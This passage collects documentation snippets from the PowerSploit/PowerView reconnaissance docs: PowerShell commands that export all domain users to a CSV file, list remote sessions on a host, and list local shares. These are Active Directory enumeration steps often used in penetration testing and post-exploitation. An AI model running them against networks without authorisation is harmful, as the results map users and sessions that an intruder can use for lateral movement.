https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Export-PowerViewCSV.md This example demonstrates how to export all domain user objects to a CSV file named 'users.csv'. The output will overwrite the file if it already exists. ```powershell Get-DomainUser | Export-PowerViewCSV -Path "users.csv" ``` -------------------------------- ### Get Remote Sessions Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetSession.md Use this snippet to retrieve active sessions from a specified remote host. 
```powershell Get-NetSession -ComputerName sqlserver ``` -------------------------------- ### Get Shares on Local Host Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetShare.md Execute this command to retrieve all active shares on the local machine. ```powershell Get-NetShare ```